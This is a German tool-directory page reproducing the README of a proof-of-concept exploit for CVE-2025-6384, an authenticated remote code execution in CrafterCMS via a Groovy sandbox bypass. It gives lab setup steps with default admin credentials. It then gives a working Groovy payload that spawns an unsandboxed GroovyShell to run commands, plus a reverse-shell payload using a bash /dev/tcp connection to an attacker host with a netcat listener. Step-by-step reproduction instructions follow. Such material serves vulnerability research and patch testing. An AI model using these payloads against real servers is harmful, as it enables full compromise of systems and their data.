Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CrafterCMS-CVE-2025-6384 — PoC-Exploit für eine authentifizierte RCE in CrafterCMS mittels Groovy-Sandbox-Bypass (CVE-2025-6384) | Kitploit
Tools/GitHubGitHub/maestro-ant/craftercms-cve-2025-6384
SchwachstellenanalyseExploitationWebanwendungs-ExploitationPenetrationstestsLernen & BildungLabs & Praxis
GitHubmaestro-ant/craftercms-cve-2025-6384

CrafterCMS-CVE-2025-6384

PoC-Exploit für eine authentifizierte RCE in CrafterCMS mittels Groovy-Sandbox-Bypass (CVE-2025-6384)

Repository anzeigen
4vor 11 MonatenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CrafterCMS Authenticated RCE - Groovy Sandbox Bypass (CVE-2025-6384)

Ein Proof of Concept für eine authentifizierte Remote Code Execution-Schwachstelle in CrafterCMS.

Schwachstellenübersicht

Ein authentifizierter Benutzer mit Entwicklerrechten kann die Groovy-Skript-Sandbox in Crafter Studio umgehen, um eine Remote Code Execution (RCE) zu erreichen. Die Sandbox blockiert nicht die Instanziierung einer neuen GroovyShell, die verwendet werden kann, um eine neue, uneingeschränkte Ausführungsumgebung zu erstellen.

  • Produkt: CrafterCMS
  • Komponente: Crafter Studio
  • Schwachstelle: Authentifizierte RCE via Groovy Sandbox Bypass (CWE-913)
  • Auswirkung: Komplette Serverkompromittierung

Labor-Setup / Bereitstellung

Sie können schnell eine angreifbare CrafterCMS-Instanz zum Testen bereitstellen, indem Sie die offiziellen Docker Compose-Dateien verwenden.

  1. Klonen Sie das docker-compose-Repository von CrafterCMS:

    root@kitploit:~
    git clone https://github.com/craftercms/docker-compose.git
    
  • Navigieren Sie zum Authoring-Umgebungsverzeichnis:

    root@kitploit:~
    cd docker-compose/authoring
    
  • Starten Sie die Container. Dies lädt die erforderlichen Images herunter und startet den CrafterCMS-Stack.

    root@kitploit:~
    docker-compose up
    

    (Hinweis: sudo kann je nach Docker-Installation erforderlich sein.)

  • Warten Sie, bis die Dienste vollständig initialisiert sind. Sie können auf Crafter Studio unter http://localhost:8080/studio zugreifen.

    • Standard-Benutzername: admin
    • Standard-Passwort: admin
  • Proof of Concept (PoC)

    Während die Sandbox direkte Ausführungsmethoden korrekt blockiert, erlaubt sie die folgende Payload, die eine neue, nicht gesandboxte Groovy-Shell erstellt.

    root@kitploit:~
    // File: /scripts/interceptors/pwn.groovy
    
    def shell = new GroovyShell()
    def command = "id" // <-- Ihr Befehl hier
    def result = shell.evaluate("'''${command}'''.execute().text")
    
    // Die Ausgabe wird in den Server-Logs gedruckt
    System.err.println("[RCE-PoC] " + result)
    

    RCE-Exploit: Reverse Shell

    Diese Payload demonstriert vollständige RCE durch die Einrichtung einer Reverse Shell zurück zu einem angreifergesteuerten Rechner.

    1. Starten Sie einen Listener

    Starten Sie auf Ihrem Rechner einen Listener (z. B. mit netcat), um die eingehende Verbindung zu empfangen:

    root@kitploit:~
    nc -lvnp 4444
    

    2. Bereiten Sie die Payload vor

    Verwenden Sie das folgende Groovy-Skript als Ihre Payload. Denken Sie daran, <YOUR_IP> und <YOUR_PORT> durch die IP-Adresse und den Port Ihres Listeners zu ersetzen.

    root@kitploit:~
    // File: /scripts/interceptors/exploit.groovy
    
    def attacker_ip = "<YOUR_IP>"
    def attacker_port = "4444" // Oder <YOUR_PORT>
    
    def cmd = "bash -i >& /dev/tcp/" + attacker_ip + "/" + attacker_port + " 0>&1"
    def shell = new GroovyShell()
    
    // Verwenden Sie dreifache Anführungszeichen, um die Befehlszeichenkette einfach zu handhaben
    shell.evaluate("""
        new ProcessBuilder("/bin/bash", "-c", "${cmd}").start()
    """)
    
    System.err.println("Reverse-Shell-Payload ausgeführt.")
    

    Schritte zur Reproduktion

    1. Melden Sie sich bei Crafter Studio (http://localhost:8080/studio) mit den Standard-Anmeldedaten (admin / admin) an.

    2. Navigieren Sie zu Site Config -> Scripts.

    3. Klicken Sie unter dem Abschnitt "Groovy Scripts" auf Create/Edit Script.

      image
    4. Wählen Sie einen Skripttyp aus, der ausgeführt wird, z. B. Request Interceptor.

    5. Fügen Sie die PoC-Payload in den Skripteditor ein und speichern Sie sie.

      image
    6. Lösen Sie das Skript aus, indem Sie eine beliebige Seite auf der Website besuchen (z. B. http://localhost:8080).

    7. Überprüfen Sie die Standard-Fehlerlogs des Servers, um die Befehlsausgabe zu sehen.

      • Für den PoC finden Sie Ihre Container-ID und prüfen Sie die Logs auf die Befehlsausgabe:
      root@kitploit:~
      docker-compose logs -f crafter
      

      Erwartete Ausgabe:

      root@kitploit:~
      GroovyShell: uid=1000(crafter) gid=1000(crafter) groups=1000(crafter)
      
      image
      • Für die Reverse Shell überprüfen Sie Ihren netcat-Listener. Sie sollten eine Shell-Sitzung vom Container erhalten. image

    Haftungsausschluss

    Dieses Material dient nur zu Bildungs- und Forschungszwecken. Der Autor ist nicht verantwortlich für Missbrauch oder Schäden, die durch diese Informationen verursacht werden.

    Tool herunterladen